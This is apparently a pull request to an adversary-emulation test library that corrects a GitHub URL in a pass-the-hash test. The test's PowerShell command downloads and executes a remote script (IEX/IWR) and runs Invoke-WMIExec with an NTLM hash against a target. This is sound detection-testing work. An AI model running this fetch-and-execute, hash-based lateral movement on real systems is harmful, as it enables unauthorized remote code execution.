### PR TITLE
Corrected github url to raw powershell from html

### DIFF
--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -110,5 +110,5 @@ atomic_tests:
   executor:
     command: |-
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+      IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
     name: powershell


### PR DESCRIPTION
**Details:**
Command for Invoke-WMIExec Pass the Hash - T1550.002 attempts to download Invoke-WMIExec.ps1 from GIthub, however the URL pointed to the github HTML page for the file rather than the raw powershell content. This lead to errors when invoke-expression was called on the string.
I have corrected the URL to point to the raw.githubusercontent.com version

**Testing:**
Re-ran test and errors were no longer present.

**Associated Issues:**
N/A